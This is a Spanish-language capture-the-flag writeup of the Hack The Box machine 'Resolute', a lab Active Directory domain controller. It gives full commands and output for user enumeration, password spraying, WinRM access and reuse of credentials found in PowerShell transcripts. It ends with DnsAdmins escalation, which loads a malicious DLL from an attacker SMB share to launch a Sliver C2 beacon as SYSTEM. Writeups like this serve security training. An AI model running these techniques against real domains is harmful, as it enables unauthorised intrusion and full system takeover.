Table of Contents
Hack The Box: Resolute Writeup
Welcome to my detailed writeup of the medium difficulty machine “Resolute” on Hack The Box. This writeup will cover the steps taken to achieve initial foothold and escalation to root.
TCP Enumeration
1$ rustscan -a 10.129.201.75 --ulimit 5000 -g
210.129.201.75 -> [53,88,135,139,389,445,464,593,3268,9389,47001,49664,49665,49666,49667,49670,49676,49682,49677,49731]
1$ nmap -p53,88,135,139,389,445,464,593,3268,9389,47001,49664,49665,49666,49667,49670,49676,49682,49677,49731 -sCV 10.129.201.75 -oN allPorts
2Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-07 21:11 CEST
3Nmap scan report for 10.129.201.75
4Host is up (0.037s latency).
5
6PORT STATE SERVICE VERSION
753/tcp open domain Simple DNS Plus
888/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-07 17:18:30Z)
9135/tcp open msrpc Microsoft Windows RPC
10139/tcp open netbios-ssn Microsoft Windows netbios-ssn
11389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
12445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
13464/tcp open kpasswd5?
14593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
153268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
169389/tcp open mc-nmf .NET Message Framing
1747001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
18|_http-title: Not Found
19|_http-server-header: Microsoft-HTTPAPI/2.0
2049664/tcp open msrpc Microsoft Windows RPC
2149665/tcp open msrpc Microsoft Windows RPC
2249666/tcp open msrpc Microsoft Windows RPC
2349667/tcp open msrpc Microsoft Windows RPC
2449670/tcp open msrpc Microsoft Windows RPC
2549676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
2649677/tcp open msrpc Microsoft Windows RPC
2749682/tcp open msrpc Microsoft Windows RPC
2849731/tcp open unknown
29Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
30
31Host script results:
32| smb-os-discovery:
33| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
34| Computer name: Resolute
35| NetBIOS computer name: RESOLUTE\x00
36| Domain name: megabank.local
37| Forest name: megabank.local
38| FQDN: Resolute.megabank.local
39|_ System time: 2024-09-07T10:19:20-07:00
40| smb2-time:
41| date: 2024-09-07T17:19:21
42|_ start_date: 2024-09-07T17:14:13
43|_clock-skew: mean: 27m02s, deviation: 4h02m30s, median: -1h52m58s
44| smb-security-mode:
45| account_used: guest
46| authentication_level: user
47| challenge_response: supported
48|_ message_signing: required
49| smb2-security-mode:
50| 3:1:1:
51|_ Message signing enabled and required
52
53Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
54Nmap done: 1 IP address (1 host up) scanned in 66.23 seconds
UDP Enumeration
1$ sudo nmap --top-ports 1500 -sU --min-rate 5000 -n -Pn 10.129.201.75 -oN allPorts.UDP
2Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-07 21:11 CEST
3Nmap scan report for 10.129.201.75
4Host is up (0.038s latency).
5Not shown: 1496 open|filtered udp ports (no-response)
6PORT STATE SERVICE
788/udp open kerberos-sec
8123/udp open ntp
917673/udp closed unknown
1020164/udp closed unknown
11
12Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds
Del escaneo inicial encontramos el dominio megabank.local, lo añadimos al /etc/hosts
SMB Enumeration
Podemos intentar enumerar el SMB con smbmap y smbclient haciendo uso de una null session pero no conseguimos nada.
1$ smbmap -H 10.129.201.75 -u ''
2[+] IP: 10.129.201.75:445 Name: megabank.local
1$ smbclient -L \\10.129.201.75 -U '' -N
2
3 Sharename Type Comment
4 --------- ---- -------
5Reconnecting with SMB1 for workgroup listing.
6do_connect: Connection to 10.129.201.75 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
7Unable to connect with SMB1 -- no workgroup available
1$ smbclient -L \\10.129.201.75 -U 'null' -N
2session setup failed: NT_STATUS_LOGON_FAILURE
LDAP Enumeration
Podemos ver sin necesidad de credenciales válidas varios usuarios en el LDAP.
1$ ldapsearch -x -H ldap://megabank.local -D '' -w '' -b "DC=MEGABANK,DC=LOCAL" > ldapdump.txt
Podemos filtrar por nombre de usuario y crear una lista de usuarios.
1$ ldapsearch -x -H ldap://megabank.local -D '' -w '' -b "CN=Users,DC=MEGABANK,DC=LOCAL" | grep sAMAccountName: | awk '{print $2}' > users.txt
De esta forma habrán varias líneas que no correspondan a usuarios válidos pero no pasa nada.
Porque ahora con kerbrute podemos validar que usuarios son válidos.
1$ /opt/kerbrute userenum --dc 10.129.201.75 users.txt -d megabank.local
2
3 __ __ __
4 / /_____ _____/ /_ _______ __/ /____
5 / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
6 / ,< / __/ / / /_/ / / / /_/ / /_/ __/
7/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
8
9Version: v1.0.3 (9dad6e1) - 09/07/24 - Ronnie Flathers @ropnop
10
112024/09/07 21:34:38 > Using KDC(s):
122024/09/07 21:34:38 > 10.129.201.75:88
13
142024/09/07 21:34:38 > [+] VALID USERNAME: sunita@megabank.local
152024/09/07 21:34:38 > [+] VALID USERNAME: abigail@megabank.local
162024/09/07 21:34:38 > [+] VALID USERNAME: marcus@megabank.local
172024/09/07 21:34:38 > [+] VALID USERNAME: fred@megabank.local
182024/09/07 21:34:38 > [+] VALID USERNAME: sally@megabank.local
192024/09/07 21:34:38 > [+] VALID USERNAME: felicia@megabank.local
202024/09/07 21:34:38 > [+] VALID USERNAME: angela@megabank.local
212024/09/07 21:34:38 > [+] VALID USERNAME: gustavo@megabank.local
222024/09/07 21:34:38 > [+] VALID USERNAME: ulf@megabank.local
232024/09/07 21:34:38 > [+] VALID USERNAME: stevie@megabank.local
242024/09/07 21:34:38 > [+] VALID USERNAME: claire@megabank.local
252024/09/07 21:34:38 > [+] VALID USERNAME: paulo@megabank.local
262024/09/07 21:34:38 > [+] VALID USERNAME: annette@megabank.local
272024/09/07 21:34:38 > [+] VALID USERNAME: steve@megabank.local
282024/09/07 21:34:38 > [+] VALID USERNAME: annika@megabank.local
292024/09/07 21:34:38 > [+] VALID USERNAME: per@megabank.local
302024/09/07 21:34:38 > [+] VALID USERNAME: claude@megabank.local
312024/09/07 21:34:38 > [+] VALID USERNAME: melanie@megabank.local
322024/09/07 21:34:38 > [+] VALID USERNAME: zach@megabank.local
332024/09/07 21:34:38 > [+] VALID USERNAME: simon@megabank.local
342024/09/07 21:34:38 > [+] VALID USERNAME: naoki@megabank.local
352024/09/07 21:34:38 > Done! Tested 38 usernames (21 valid) in 0.168 seconds
Podemos meter todos esos usuarios en un fichero users.txt y con awk quedarnos solo con el nombre de usuario.
1$ cat u.txt | awk '{print $7}' | awk -F@ '{print $1}' > users.txt && cat users.txt
2sunita
3abigail
4marcus
5fred
6sally
7felicia
8angela
9gustavo
10ulf
11stevie
12claire
13paulo
14annette
15steve
16annika
17per
18claude
19melanie
20zach
21simon
22naoki
ASREPRoast (failed)
Y ahora tenemos una lista válidas de usuario, estoy es muy útil ya que ahora podemos intentar hacer un ataque de tipo ASREPRoast para detectar si algún usuario tiene el atributo DONT_REQUIRE_PREAUTH y capturar un TGT para poder crackearlo de forma offline.
Ahora con GetNPUsers de la suite de impacket podemos comprobar esto.
1$ impacket-GetNPUsers -no-pass -usersfile users.txt megabank.local/ 21:39:27 [1/9961]
2Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
3
4[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
5[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
6[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
7[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
8[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
9[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
10[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
11[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
12[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
13[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
14[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
15[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
16[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
17[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
18[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
19[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
20[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
21[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
22[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
23[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
24[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set
Pero no detectamos ningún usuario que cumpla este requisito.
Enumerating RPC -> Information Disclosure
Podemos utilizar rpcclient y nos damos cuenta de que también podemos enumerar información interna haciendo uso de una null session pero ahora a través del protocolo RPC.
1$ rpcclient -N -U "" 10.129.201.75
2rpcclient $> enumdomusers
3user:[Administrator] rid:[0x1f4]
4user:[Guest] rid:[0x1f5]
5user:[krbtgt] rid:[0x1f6]
6user:[DefaultAccount] rid:[0x1f7]
7user:[ryan] rid:[0x451]
8user:[marko] rid:[0x457]
9user:[sunita] rid:[0x19c9]
10user:[abigail] rid:[0x19ca]
11user:[marcus] rid:[0x19cb]
12user:[sally] rid:[0x19cc]
13user:[fred] rid:[0x19cd]
En estos casos, me gusta utilizar rpcenum una herramienta en bash hecha por s4vitar para extraer información del dominio utilizando rpcclient
Nos clonamos el repo.
1$ git clone https://github.com/s4vitar/rpcenum
2Cloning into 'rpcenum'...
3remote: Enumerating objects: 54, done.
4remote: Counting objects: 100% (19/19), done.
5remote: Compressing objects: 100% (5/5), done.
6remote: Total 54 (delta 15), reused 14 (delta 14), pack-reused 35 (from 1)
7Receiving objects: 100% (54/54), 577.54 KiB | 3.24 MiB/s, done.
8Resolving deltas: 100% (15/15), done.
Con esta herramienta podemos listar los usuarios del dominio incluyendo sus descripciones “si tenemos permisos para ello”
1$ sudo ./rpcenum -e DUsersInfo -i 10.129.201.75
2
3[*] Listing domain users with description...
4
5
6 + + +
7 | User | Description |
8 + + +
9 | Administrator | Built-in account for administering the computer/domain |
10 | Guest | Built-in account for guest access to the computer/domain |
11 | krbtgt | Key Distribution Center Service Account |
12 | DefaultAccount | A user account managed by the system. |
13 | marko | Account created. Password set to Welcome123! |
14 + + +
Vemos una descripción para el usuario marko y nos indica que la credencial inicial de esta cuenta es Welcome123!
Podemos comprobarlo con netexec
1 nxc smb 10.129.201.75 -u marko -p 'Welcome123!'
2SMB 10.129.201.75 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
3SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
Nos indica que la credencial no es válida.
Podemos probar esta credencial con todas las cuentas de usuario.
1$ nxc smb 10.129.201.75 -u users.txt -p 'Welcome123!' --continue-on-success 21:47:23 [1/9225]
2SMB 10.129.201.75 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
3SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
4SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
5SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
6SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
7SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
8SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
9SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
10SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
11SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
12SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
13SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
14SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
15SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
16SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
17SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
18SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
19SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
20SMB 10.129.201.75 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
21SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
22SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
23SMB 10.129.201.75 445 RESOLUTE [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
Y detectamos que esa credencial también la tiene el usuario melanie
Abusing WinRM -> Foothold
1$ nxc winrm 10.129.201.75 -u melanie -p 'Welcome123!'
2WINRM 10.129.201.75 5985 RESOLUTE [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
3WINRM 10.129.201.75 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)
Vemos que este usuario parece estar en el grupo Remote Management Users por lo cual podemos hacer uso de herramientas como evil-winrm para conseguir una consola en la máquina víctima.
1$ nxc winrm 10.129.201.75 -u melanie -p 'Welcome123!'
2WINRM 10.129.201.75 5985 RESOLUTE [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
3WINRM 10.129.201.75 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)
4┌─[192.168.1.52]─[pointedsec@parrot]─[~/Desktop/resolute/content]
5└──╼ [★]$ evil-winrm -i 10.129.201.75 -u melanie -p 'Welcome123!'
6
7Evil-WinRM shell v3.5
8
9Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
10
11Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
12
13Info: Establishing connection to remote endpoint
14*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
15megabank\melanie
Podemos ver la flag de usuario
1*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
23f3fe89c6f34ca3e...
User Pivoting
El usuario melanie no tiene ningún privilegio especial.
1*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami /priv
2
3PRIVILEGES INFORMATION
4----------------------
5
6Privilege Name Description State
7============================= ============================== =======
8SeMachineAccountPrivilege Add workstations to domain Enabled
9SeChangeNotifyPrivilege Bypass traverse checking Enabled
10SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Vemos el directorio personal del usuario ryan y vemos que pertenece a un grupo llamado Contractors que es un poco extraño.
1*Evil-WinRM* PS C:\Users> dir
2
3
4 Directory: C:\Users
5
6
7Mode LastWriteTime Length Name
8---- ------------- ------ ----
9d----- 9/25/2019 10:43 AM Administrator
10d----- 12/4/2019 2:46 AM melanie
11d-r--- 11/20/2016 6:39 PM Public
12d----- 9/27/2019 7:05 AM ryan
13
14
15*Evil-WinRM* PS C:\Users> net user ryan
16User name ryan
17Full Name Ryan Bertrand
18Comment
19User's comment
20Country/region code 000 (System Default)
21Account active Yes
22Account expires Never
23
24Password last set 9/7/2024 11:02:02 AM
25Password expires Never
26Password changeable 9/8/2024 11:02:02 AM
27Password required Yes
28User may change password Yes
29
30Workstations allowed All
31Logon script
32User profile
33Home directory
34Last logon Never
35
36Logon hours allowed All
37
38Local Group Memberships
39Global Group memberships *Domain Users *Contractors
40The command completed successfully.
Bloodhound
Vamos a subir el SharpHound para recolectar información sobre el dominio y detectar formas de escalar privilegios en el dominio con bloodhound
Subimos el SharpHound a través de la función upload de evil-winrm
1*Evil-WinRM* PS C:\ProgramData> upload SharpHound.exe
2
3Info: Uploading /home/pointedsec/Desktop/resolute/content/SharpHound.exe to C:\ProgramData\SharpHound.exe
4
5Data: 1402880 bytes of 1402880 bytes copied
6
7Info: Upload successful!
Ahora podemos lanzar la herramienta.
1*Evil-WinRM* PS C:\ProgramData> .\SharpHound.exe -c All -d megabank.local
22024-09-07T11:11:55.2405987-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
32024-09-07T11:11:55.4124823-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
42024-09-07T11:11:55.4437225-07:00|INFORMATION|Initializing SharpHound at 11:11 AM on 9/7/2024
52024-09-07T11:11:55.5843471-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for megabank.local : Resolute.megabank.local
62024-09-07T11:12:07.7250013-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
72024-09-07T11:12:07.8968782-07:00|INFORMATION|Beginning LDAP search for megabank.local
82024-09-07T11:12:07.9593752-07:00|INFORMATION|Producer has finished, closing LDAP channel
92024-09-07T11:12:07.9593752-07:00|INFORMATION|LDAP channel closed, waiting for consumers
102024-09-07T11:12:38.7876233-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 34 MB RAM
112024-09-07T11:13:08.8033238-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
122024-09-07T11:13:14.2720152-07:00|INFORMATION|Consumers finished, closing output channel
13Closing writers
142024-09-07T11:13:14.3032660-07:00|INFORMATION|Output channel closed, waiting for output task to complete
152024-09-07T11:13:14.4595214-07:00|INFORMATION|Status: 123 objects finished (+123 1.863636)/s -- Using 42 MB RAM
162024-09-07T11:13:14.4595214-07:00|INFORMATION|Enumeration finished in 00:01:06.5750879
172024-09-07T11:13:14.5532817-07:00|INFORMATION|Saving cache with stats: 80 ID to type mappings.
18 80 name to SID mappings.
19 0 machine sid mappings.
20 2 sid to domain mappings.
21 0 global catalog mappings.
222024-09-07T11:13:14.5688900-07:00|INFORMATION|SharpHound Enumeration Completed at 11:13 AM on 9/7/2024! Happy Graphing!
Nos descargamos el zip que genera utilizando download de evil-winrm
1-a---- 9/7/2024 11:13 AM 13467 20240907111313_BloodHound.zip
Ahora iniciamos la base de datos que utiliza bloodhound, neo4j
1$ sudo neo4j start
2Directories in use:
3home: /usr/share/neo4j
4config: /usr/share/neo4j/conf
5logs: /etc/neo4j/logs
6plugins: /usr/share/neo4j/plugins
7import: /usr/share/neo4j/import
8data: /etc/neo4j/data
9certificates: /usr/share/neo4j/certificates
10licenses: /usr/share/neo4j/licenses
11run: /var/lib/neo4j/run
12Starting Neo4j.
13Started neo4j (pid:5212). It is available at http://localhost:7474
14There may be a short delay until the server is ready.
Y ya podemos abrir bloodhound e importar el zip.
Una vez importado, buscamos a melanie y la marcamos como owneada.
Detectamos que el usuario Administrator tiene una sesión en el DC.
Aunque no encontramos nada relevante para el usuario ryan
Winpeas
Vamos a pasar el winpeas para ver si conseguimos información relevante.
Primero lo subimos a la máquina víctima, estoy subiendo la versión en .bat ya que por alguna razón los ejecutables no puedo ejecutarlos ya que me reporta que no son válidos para la versión del sistema operativo.
1*Evil-WinRM* PS C:\ProgramData> upload winPEAS.bat
2
3Info: Uploading /home/pointedsec/Desktop/resolute/content/winPEAS.bat to C:\ProgramData\winPEAS.bat
4
5Data: 48236 bytes of 48236 bytes copied
6
7Info: Upload successful!
No encontramos nada en el reporte de winpeas
Detectamos un directorio oculto llamado PSTranscripts en la raíz del sistema.
1*Evil-WinRM* PS C:\> dir -force
2
3
4 Directory: C:\
5
6
7Mode LastWriteTime Length Name
8---- ------------- ------ ----
9d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
10d--hsl 9/25/2019 10:17 AM Documents and Settings
11d----- 9/25/2019 6:19 AM PerfLogs
12d-r--- 9/25/2019 12:39 PM Program Files
13d----- 11/20/2016 6:36 PM Program Files (x86)
14d--h-- 9/7/2024 11:26 AM ProgramData
15d--h-- 12/3/2019 6:32 AM PSTranscripts
16d--hs- 9/25/2019 10:17 AM Recovery
17d--hs- 9/25/2019 6:25 AM System Volume Information
18d-r--- 12/4/2019 2:46 AM Users
19d----- 12/4/2019 5:15 AM Windows
20-arhs- 11/20/2016 5:59 PM 389408 bootmgr
21-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
22-a-hs- 9/7/2024 10:14 AM 402653184 pagefile.sys
Encontramos una archivo extraño.
1*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force
2
3
4 Directory: C:\PSTranscripts\20191203
5
6
7Mode LastWriteTime Length Name
8---- ------------- ------ ----
9-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Leyendo el archivo encontramos esta línea.
1>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
Una credencial supuestamente para ryan Serv3r4Admin4cc123!
Vamos a comprobar esta credencial con netexec
Por alguna razón nos reporta Pwn3d! pero sabemos que este usuario no pertenece al grupo de administradores del dominio.
1$ nxc smb 10.129.201.75 -u ryan -p 'Serv3r4Admin4cc123!'
2SMB 10.129.201.75 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
3SMB 10.129.201.75 445 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
ryan pertenece al grupo Contractors que a su vez pertenece al grupo DNSAdmins y Remote Management Users
Obviamente no tenemos permisos de escritura en ninguno de los directorios que utiliza psexec, no se porqué netexec reportó eso.
1$ psexec.py -dc-ip 10.129.201.75 megabank.local/ryan:'Serv3r4Admin4cc123!@resolute.megabank.local' -target-ip 10.129.201.75
2Impacket v0.12.0.dev1+20240819.165705.f98c9870 - Copyright 2023 Fortra
3
4[*] Requesting shares on 10.129.201.75.....
5[-] share 'ADMIN$' is not writable.
6[-] share 'C$' is not writable.
7[-] share 'NETLOGON' is not writable.
8[-] share 'SYSVOL' is not writable.
Igualmente podemos migrar al usuario ryan a través de evil-winrm
1$ evil-winrm -i 10.129.201.75 -u ryan -p 'Serv3r4Admin4cc123!'
2
3Evil-WinRM shell v3.5
4
5Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
6
7Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
8
9Info: Establishing connection to remote endpoint
10*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
11megabank\ryan
Privilege Escalation
Sabemos que ryan indirectamente pertenece al grupo DnsAdmins
Podemos leer este post sobre la escalada de privilegios haciendo una inyección DLL al proceso del servidor DNS, ya que este proceso es privilegiado, conseguiremos ejecutar comandos como un usuario privilegiado y escalar privilegios.
Voy a utilizar este PoC
Nos clonamos el repositorio.
1C:\Users\pc\Desktop\dlladmin>git clone https://github.com/kazkansouh/DNSAdmin-DLL
2Cloning into 'DNSAdmin-DLL'...
3remote: Enumerating objects: 15, done.
4remote: Counting objects: 100% (15/15), done.
5remote: Compressing objects: 100% (12/12), done.
6remote: Total 15 (delta 3), reused 15 (delta 3), pack-reused 0 (from 0)
7Receiving objects: 100% (15/15), 21.70 KiB | 1.21 MiB/s, done.
8Resolving deltas: 100% (3/3), done.
Lo abrimos en Visual Studio.
Y en el archivo DNSAdmin-DLL.cpp vamos a cambiar el contenido de la función DnsPluginInitialize. Esta es la función donde vamos a poder ejecutar el comando a nivel de sistema.
Modificamos el código para simplemente ejecutar el ejecutable de nuestro beacon de sliver que vamos a crear mas adelante.
1DWORD WINAPI DnsPluginInitialize(
2 PVOID pDnsAllocateFunction,
3 PVOID pDnsFreeFunction)
4{
5 FILE* f = NULL;
6 system("c:\\test\\s.exe");
7 return ERROR_SUCCESS;
8}Ahora compilamos el proyecto en Release
Aquí tenemos el DLL.
Nos lo pasamos a nuestra máquina de atacante creando un servidor SMB con impacket-smbserver
1$ sudo impacket-smbserver -smb2support smbFolder .
Vamos con sliver a generar un beacon.
1[server] sliver > generate beacon --os windows --format exe --seconds 5 --mtls 10.10.14.125 --arch amd64
2
3[*] Generating new windows/amd64 beacon implant binary (5s)
4[*] Symbol obfuscation is enabled
5[*] Build completed in 46s
6[*] Implant saved to /home/pointedsec/Desktop/resolute/LUCKY_SPEND.exe
Ahora lo he subido a la máquina víctima al directorio C:\test\s.exe
1*Evil-WinRM* PS C:\test> dir
2
3
4 Directory: C:\test
5
6
7Mode LastWriteTime Length Name
8---- ------------- ------ ----
9-a---- 9/7/2024 11:53 AM 15817728 s.exe
10-a---- 9/7/2024 11:52 AM 137 users.txt
Ahora, con el servidor SMB abierto.
1$ sudo impacket-smbserver -smb2support smbFolder .
2Impacket v0.12.0.dev1+20240819.165705.f98c9870 - Copyright 2023 Fortra
3
4[*] Config file parsed
5[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
6[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
7[*] Config file parsed
8[*] Config file parsed
909/07/2024 10:58:05 PM: INFO: Config file parsed
Vamos a cambiar el DLL la próxima vez que el servicio se inicie a nuestro DLL de nuestra máquina que estamos sirviendo a través del SMB.
1*Evil-WinRM* PS C:\test> dnscmd resolute /config /serverlevelplugindll \\10.10.14.125\smbFolder\privesc.dll
2
3Registry property serverlevelplugindll successfully reset.
4Command completed successfully.
5
Podemos comprobar que todo ha salido bien.
1*Evil-WinRM* PS C:\test> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
2
3
4ServerLevelPluginDll : \\10.10.14.125\smbFolder\privesc.dll
5PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
6PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
7PSChildName : Parameters
8PSDrive : HKLM
9PSProvider : Microsoft.PowerShell.Core\Registry
10
11
12
Podemos observar que el valor de ServerLevelPluginDll es \\10.10.14.125\smbFolder\privesc.dll el cual es nuestro DLL.
Ahora solo falta reiniciar el servicio.
1*Evil-WinRM* PS C:\test> sc.exe \\resolute stop dns
2
3SERVICE_NAME: dns
4 TYPE : 10 WIN32_OWN_PROCESS
5 STATE : 3 STOP_PENDING
6 (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
7 WIN32_EXIT_CODE : 0 (0x0)
8 SERVICE_EXIT_CODE : 0 (0x0)
9 CHECKPOINT : 0x0
10 WAIT_HINT : 0x0
11*Evil-WinRM* PS C:\test> sc.exe \\resolute start dns
12
13SERVICE_NAME: dns
14 TYPE : 10 WIN32_OWN_PROCESS
15 STATE : 2 START_PENDING
16 (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
17 WIN32_EXIT_CODE : 0 (0x0)
18 SERVICE_EXIT_CODE : 0 (0x0)
19 CHECKPOINT : 0x0
20 WAIT_HINT : 0x7d0
21 PID : 3728
22 FLAGS :
Y podemos ver en Sliver que nos llega un nuevo beacon.
1[*] Beacon ff2756b4 LUCKY_SPEND - 10.129.201.75:51717 (Resolute) - windows/amd64 - Sat, 07 Sep 2024 22:52:48 CEST
Y vemos un beacon como NT Authority\system
1[server] sliver > beacons
2
3 ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
4========== ================= =========== ============ ===================== ================== =============== ===============
5 17f341b1 DEVELOPING_BELL mtls Acute-PC01 ACUTE\edavies windows/amd64 24h46m52s 24h46m45s
6 5662342a DEVELOPING_BELL mtls Acute-PC01 ACUTE\edavies windows/amd64 24h43m37s 24h43m32s
7 d503925b DEVELOPING_BELL mtls Acute-PC01 ACUTE\edavies windows/amd64 21h42m29s 21h42m24s
8 534e5b6d LUCKY_SPEND mtls Resolute MEGABANK\ryan windows/amd64 21s 2s
9 ff2756b4 LUCKY_SPEND mtls Resolute NT AUTHORITY\SYSTEM windows/amd64 12s 18s
Ahora podemos migrar a una sesión para conseguir una consola.
Utilizamos el beacon.
1[server] sliver > use ff2756b4
2
3[*] Active beacon LUCKY_SPEND (ff2756b4-8ce0-4621-951c-7b8a0274dafc)
Creamos la sesión.
1[server] sliver (LUCKY_SPEND) > interactive
2
3[*] Using beacon's active C2 endpoint: mtls://10.10.14.125:8888
4[*] Tasked beacon LUCKY_SPEND (8f35a81f)
5
